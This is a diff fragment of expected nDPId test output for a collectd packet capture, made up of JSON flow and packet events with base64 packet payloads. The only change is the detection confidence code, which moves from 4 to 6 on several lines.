-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742155132,"flow_last_seen":946742155132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36320,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742155132,"flow_last_seen":946742155132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36320,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":5,"total-skipped-flows":0,"total-l4-payload-len":6710,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1655315218479} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315218479,"flow_last_seen":1655315218479,"flow_idle_time":200000,"flow_min_l4_payload_len":1344,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1344,"flow_avg_l4_payload_len":1344,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02235{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655315218479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1386,"pkt_l4_len":1352,"thread_ts_msec":1655315218479,"pkt":"AAAAAAAAAAAAAAAACABFAAVcLQ9AAEARCoB\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\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\/mAAgADBiqhsSesvscAAMABjAAAAUADHNvZnRpcnEAAAYADwABAgAAAAAAAOnzAAgADBiqhsSesv0mAAMABjEAAAYADwABAgAAAAAAAHMKAAgADBiqhsSesuvPAAUADmludGVycnVwdAAABgAPAAECAAAAAAAAo1oACAAMGKqGxJ6y8H0AAwAGMwAABgAPAAECAAAAAAAAbUsACAAMGKqGxJ6y\/yAAAwAGMgAABQAMc29mdGlycQAABgAPAAECAAAAAAAAUq8ACAAMGKqGxJ6zBsgAAwAGMAAABQAKc3RlYWwAAAYADwABAgAAAAAAAAAAAAgADBiqhsSeswuRAAMABjIAAAYADwABAgAAAAAAAAAAAAgADBiqhsSest6\/AAUACW5pY2UAAAYADwABAgAAAAAAAAAr"} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315218479,"flow_last_seen":1655315218479,"flow_idle_time":200000,"flow_min_l4_payload_len":1344,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1344,"flow_avg_l4_payload_len":1344,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315218479,"flow_last_seen":1655315218479,"flow_idle_time":200000,"flow_min_l4_payload_len":1344,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1344,"flow_avg_l4_payload_len":1344,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7,"source":"collectd.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1655315218479,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39577,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
@@ -29,28 +29,28 @@ 02214{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655315238479,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1370,"pkt_l4_len":1336,"thread_ts_msec":1655315238479,"pkt":"AAAAAAAAAAAAAAAACABFAAVMObJAAEAR\/ex\/AAABfwAAAdN6ZOIFOANMAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhscetBqdAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMQAABAAIY3B1AAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAKNkAAgADBiqhscetF03AAMABjMAAAUADHNvZnRpcnEAAAYADwABAgAAAAAAADppAAgADBiqhscetFN7AAMABjIAAAYADwABAgAAAAAAAFKyAAgADBiqhsces99LAAMABjMAAAUACW5pY2UAAAYADwABAgAAAAAAAAAwAAgADBiqhscetHcUAAMABjIAAAUACnN0ZWFsAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobHHrSGmwADAAYzAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobHHrSVUgADAAYwAAAFAAlpZGxlAAAGAA8AAQIAAAAAAEY\/oQAIAAwYqobHHrSeKQADAAYxAAAGAA8AAQIAAAAAAEfo0wAIAAwYqobHHrSp9QADAAYyAAAGAA8AAQIAAAAAAEm7CwAIAAwYqobHHrSzJwADAAYzAAAGAA8AAQIAAAAAAEiCvgAIAAwYqobHHrz4NAACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAnhPtQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAAPBdwEEABQALY2FjaGVkAAAGAA8AAQEAAAAAgoHmQQAFAAlmcmVlAAAGAA8AAQEAAAAAQP+\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"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315313991,"flow_last_seen":1655315313991,"flow_idle_time":200000,"flow_min_l4_payload_len":1343,"flow_max_l4_payload_len":1343,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":1343,"midstream":0,"thread_ts_msec":1655315313991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1655315313991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1385,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1385,"pkt_l4_len":1351,"thread_ts_msec":1655315313991,"pkt":"AAAAAAAAAAAAAAAACABFAAVbgM9AAEARtsB\/AAABfwAAAYyUZOIFRwNbAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhtn\/u8qjAAkADAAAAAKAAAAAAAIAC21lbW9yeQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAlh\/tQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAAKhiwEEABQALY2FjaGVkAAAGAA8AAQEAAAAAFLfmQQAFAAlmcmVlAAAGAA8AAQEAAAAAQOK9QQAFABBzbGFiX3VucmVjbAAABgAPAAEBAAAAAIDOl0EABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAASLbrQQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAA\/6hBAAgADBiqhtx\/ZhRUAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABac6gAIAAwYqobcf2a6WwADAAYyAAAGAA8AAQIAAAAAABQGUgAIAAwYqobcf2Z5QgADAAYxAAAGAA8AAQIAAAAAABXlMgAIAAwYqobcf2fq4wADAAYzAAAGAA8AAQIAAAAAABXmCQAIAAwYqobcf2ls0AADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKQvAAgADBiqhtx\/ak1hAAMABjEAAAYADwABAgAAAAAABKMvAAgADBiqhtx\/auPbAAMABjIAAAYADwABAgAAAAAABJkFAAgADBiqhtx\/auwdAAMABjMAAAYADwABAgAAAAAABIaAAAgADBiqhtx\/avZhAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAENoAAgADBiqhtx\/ayYTAAMABjEAAAYADwABAgAAAAAAAENqAAgADBiqhtx\/ay+GAAMABjIAAAYADwABAgAAAAAAAEY5AAgADBiqhtx\/azbWAAMABjMAAAYADwABAgAAAAAAAD4lAAgADBiqhtx\/az+lAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAmAAgADBiqhtx\/a0duAAMABjEAAAYADwABAgAAAAAAAAAxAAgADBiqhtx\/a1DeAAMABjIAAAYADwABAgAAAAAAAAArAAgADBiqhtx\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"} 
-00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315313991,"flow_last_seen":1655315313991,"flow_idle_time":200000,"flow_min_l4_payload_len":1343,"flow_max_l4_payload_len":1343,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":1343,"midstream":0,"thread_ts_msec":1655315313991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315313991,"flow_last_seen":1655315313991,"flow_idle_time":200000,"flow_min_l4_payload_len":1343,"flow_max_l4_payload_len":1343,"flow_tot_l4_payload_len":1343,"flow_avg_l4_payload_len":1343,"midstream":0,"thread_ts_msec":1655315313991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
02219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1655315323990,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1365,"pkt_l4_len":1331,"thread_ts_msec":1655315323990,"pkt":"AAAAAAAAAAAAAAAACABFAAVHirVAAEARrO5\/AAABfwAAAYyUZOIFMwNHAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqhtx\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\/bBifAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqG3v9j7tsAAwAGMAAABQAJdXNlcgAABgAPAAECAAAAAAAWnWUACAAMGKqG3v9kGvkAAwAGMwAABgAPAAECAAAAAAAV5owACAAMGKqG3v9kAsUAAwAGMQAABgAPAAECAAAAAAAV5a4ACAAMGKqG3v9kKaIAAwAGMAAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASkXAAIAAwYqobe\/2Q\/lAADAAYyAAAGAA8AAQIAAAAAAASZMwAIAAwYqobe\/2QPLwAFAAl1c2VyAAAGAA8AAQIAAAAAABQGygAIAAwYqobe\/2RCiwADAAYzAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABIaoAAgADBiqht7\/ZEc5AAMABjEAAAUACXdhaXQAAAYADwABAgAAAAAAAENuAAgADBiqht7\/ZDoJAAUAC3N5c3RlbQAABgAPAAECAAAAAAAEo1oACAAMGKqG3v9kRJUAAwAGMAAABQAJd2FpdAAABgAPAAECAAAAAAAAQ2sACAAMGKqG3v9kdBkAAwAGMQAABQAJbmljZQAABgAPAAECAAAAAAAAADEACAAMGKqG3v9kTQoAAwAGMAAABgAPAAECAAAAAAAAACYACAAMGKqG3v9kd7IAAwAGMgAABgAPAAECAAAAAAAAACsACAAMGKqG3v9kegkAAwAGMwAABgAPAAECAAAAAAAAADAACAAMGKqG3v9kSxUABQAJd2FpdAAABgAPAAECAAAAAAAAPicACAAMGKqG3v9kjPIAAwAGMgAABQAOaW50ZXJydXB0AAAGAA8AAQIAAAAAAADQKgAIAAwYqobe\/2SPNAADAAYzAAAGAA8AAQIAAAAAAABtfwAIAAwYqobe\/2R86AADAAYwAAAGAA8AAQIAAAAAAAEO8QAIAAwYqobe\/2SRKwAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAADqWgAIAAwYqobe\/2R\/CgADAAYxAAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAKOyAAgADBiqht7\/ZJVyAAMABjIAAAUADHNvZnRpcnEAAAYADwABAgAAAAAAAFLTAAgADBiqht7\/ZJMuAAMABjEAAAYADwABAgAAAAAAAHNS"} 
02227{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1655315333991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1371,"pkt_l4_len":1337,"thread_ts_msec":1655315333991,"pkt":"AAAAAAAAAAAAAAAACABFAAVNjPBAAEARqq1\/AAABfwAAAYyUZOIFOQNNAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqht7\/ZJeFAAkADAAAAAKAAAAAAAIACGNwdQAAAwAGMwAABAAIY3B1AAAFAAxzb2Z0aXJxAAAGAA8AAQIAAAAAAAA6hAAIAAwYqobe\/2SylwAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqG3v9kSVQAAwAGMgAABQAJd2FpdAAABgAPAAECAAAAAAAARkgACAAMGKqG3v9ksAAABQAKc3RlYWwAAAYADwABAgAAAAAAAAAAAAgADBiqht7\/ZMKYAAMABjEAAAUACWlkbGUAAAYADwABAgAAAAAASAZ5AAgADBiqht7\/ZMWkAAMABjIAAAYADwABAgAAAAAASdkKAAgADBiqht7\/ZMhRAAMABjMAAAYADwABAgAAAAAASKDCAAgADBiqht7\/ZKNFAAMABjEAAAUACnN0ZWFsAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobe\/2SguQADAAYwAAAGAA8AAQIAAAAAAAAAAAAIAAwYqobe\/2S1gAAFAAlpZGxlAAAGAA8AAQIAAAAAAEZc0AAIAAwYqobe\/2oc5AACAAttZW1vcnkAAAMABQAABAALbWVtb3J5AAAFAAl1c2VkAAAGAA8AAQEAAAAAtontQQAFAA1idWZmZXJlZAAABgAPAAEBAAAAADhkwEEABQAJZnJlZQAABgAPAAEBAAAAAHDUukEABQALY2FjaGVkAAAGAA8AAQEAAAAABq7mQQAFABBzbGFiX3VucmVjbAAABgAPAAEBAAAAAEDQl0EABQAOc2xhYl9yZWNsAAAGAA8AAQEAAAAAQAOpQQAFAA5hdmFpbGFibGUAAAYADwABAQAAAAAUXOtBAAgADBiqhuF\/ZJVYAAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABad0gAIAAwYqobhf2TUUQADAAYxAAAGAA8AAQIAAAAAABXmKwAIAAwYqobhf2W8mgADAAYzAAAGAA8AAQIAAAAAABXnBwAIAAwYqobhf2X1\/wADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKSOAAgADBiqhuF\/ZQ4SAAMABjIAAAUACXVzZXIAAAYADwABAgAAAAAAFAdJAAgADBiqhuF\/Z6HGAAMABjEAAAUAC3N5c3RlbQAABgAPAAECAAAAAAAEo4cACAAMGKqG4X9n2XUAAwAGMgAABgAPAAECAAAAAAAEmWAACAAMGKqG4X9ojcQAAwAGMAAABQAJd2FpdAAABgAPAAECAAAAAAAAQ20ACAAMGKqG4X9oFFcAAwAGMwAABQALc3lzdGVtAAAGAA8AAQIAAAAAAASGyQAIAAwYqobhf2k\/YgADAAYxAAAFAAl3YWl0AAAGAA8AAQIAAAAAAABDbwAIAAwYqobhf2nIHgADAAYyAAAGAA8AAQIAAAAAAABGSgAIAAwYqobhf2p39QADAAYwAAAFAAluaWNlAAAGAA8AAQIAAAAAAAAAJgAIAAwYqobh
f2qAfQADAAYxAAAGAA8AAQIAAAAAAAAAMQAIAAwYqobhf2qRzgADAAYzAAAGAA8AAQIAAAAAAAAAMAAIAAwYqobhf2qMEQADAAYyAAAGAA8AAQIAAAAAAAAAKwAIAAwYqobhf2rtCAADAAYxAAAFAA5pbnRlcnJ1cHQAAAYADwABAgAAAAAAAKO5AAgADBiqhuF\/axE6AAMABjIAAAYADwABAgAAAAAAANAv"} -00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315403990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315433990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
-00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":34,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1655315313991,"flow_last_seen":1655315503990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":30569,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315503990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":55,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1655315313991,"flow_last_seen":1655315683990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":58483,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315683990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00686{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315403990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"collectd.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655315218479,"flow_last_seen":1655315251746,"flow_idle_time":200000,"flow_min_l4_payload_len":1231,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":6534,"flow_avg_l4_payload_len":1306,"midstream":0,"thread_ts_msec":1655315433990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54138,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":34,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1655315313991,"flow_last_seen":1655315503990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":30569,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315503990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":55,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1655315313991,"flow_last_seen":1655315683990,"flow_idle_time":200000,"flow_min_l4_payload_len":1311,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":58483,"flow_avg_l4_payload_len":1329,"midstream":0,"thread_ts_msec":1655315683990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655315734133,"flow_last_seen":1655315734133,"flow_idle_time":200000,"flow_min_l4_payload_len":1334,"flow_max_l4_payload_len":1334,"flow_tot_l4_payload_len":1334,"flow_avg_l4_payload_len":1334,"midstream":0,"thread_ts_msec":1655315734133,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
